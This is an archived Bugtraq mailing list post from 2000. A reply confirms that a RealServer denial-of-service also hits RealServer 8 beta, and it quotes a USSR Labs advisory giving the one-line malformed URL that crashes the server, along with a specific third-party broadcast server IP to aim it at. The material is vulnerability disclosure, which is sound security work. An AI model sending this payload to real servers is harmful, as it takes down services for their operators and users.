Bugtraq mailing list archives

Re: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability

From: christopher () SCHULTE ORG (Christopher Schulte)
Date: Fri, 2 Jun 2000 11:31:34 -0500


This same DoS appears to work on the new realserver 8 BETA:

Platform sunos-5.7-sparc
Release RealServer 8
Build Version 6.1.3.1058

I'd be safe in guessing all other platforms are affected as well.

--
Christopher Schulte
http://www.schulte.org/

Remote DoS attack in Real Networks Real Server (Strike #2)
Vulnerability

USSR Advisory Code:   USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6
Real Networks Real Server 7 Solaris 2.6
Real Networks Real Server 7 Solaris 2.7
Real Networks Real Server 7 Solaris 2.8
Real Networks Real Server 7 Windows NT/2000
Real Networks Real Server 7 SGI Irix 6.2
Real Networks Real Server 7 SGI Irix 6.5
Real Networks Real Server 7 SCO Unixware 7.xx
Real Networks Real Server 7 FreeBSD 3.0
Real Networks Real Server 7.01 Linuxc6
Real Networks Real Server 7.01 Solaris 2.6
Real Networks Real Server 7.01 Solaris 2.7
Real Networks Real Server 7.01 Solaris 2.8
Real Networks Real Server 7.01 Windows NT/2000
Real Networks Real Server 7.01 SGI Irix 6.2
Real Networks Real Server 7.01 SGI Irix 6.5
Real Networks Real Server 7.01 SCO Unixware 7.xx
Real Networks Real Server 7.01 FreeBSD 3.0
Real Networks Real Server G2 1.0


THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the
RealServer 7 Server (patched and non-patched).

What happens is, by performing an attack sending specially-malformed
information to the RealServer HTTP Port(default is 8080), the process
containing the services will stop responding.

The Exploit:
It will take down the RealServer causing it to stop all streaming
media brodcasts, making it non-functional, (untill Reboot)

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

SPECIAL NOTE: That we take no responsibility for this Example it is
for educational purposes only,Dont test against British Broadcasting
Corporation 1999 Radio

Exaple 2:
Radio: British Broadcasting Corporation 1999 (default in RealPlayer
8)

Radio Url:
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732
F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80

RealServer http ip: 206.190.42.7

Valid Url for Clip Source:
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj
054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t
6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source:
http://206.190.42.7/viewsource/template.html?


Vendor Status:
Yes! Informed! I sent them more than 4 emails and each time I
received JUNK mails in reply, my Incident ID number for this request
is 19163930.


Vendor   Url: http://www.real.com
Program  Url:
http://www.realnetworks.com/products/basicserverplus/index.html?src=ho
me
Download Url:
http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020
400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labs () ussrback com for permission.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs () ussrback com
http://www.ussrback.com

Current thread:

Re: Remote DoS attack in Real Networks Real Server (Strike #2) vulnerability, (continued)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2) vulnerability Christopher Schulte (Jun 02)
- bind running as root in Mandrake 7.0 Nicolas MONNET (Jun 03)
  - Re: bind running as root in Mandrake 7.0 Brock Sides (Jun 03)
  - Re: bind running as root in Mandrake 7.0 White Vampire (Jun 03)
  - Re: bind running as root in Mandrake 7.0 Andrew L . Davis (Jun 04)
    - Re: bind running as root in Mandrake 7.0 Elias Levy (Jun 08)
    - Circumventing Outlook Security Update File Download Security With IFRAMEs cassius () HUSHMAIL COM (Jun 09)
    - Re: bind running as root in Mandrake 7.0 Nathan Neulinger (Jun 11)
    - Remote DoS for Mercur 3.2 |[TDP]| (Jun 13)
    - Vulnerability in Solaris ufsrestore Job de Haas (Jun 14)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability Christopher Schulte (Jun 02)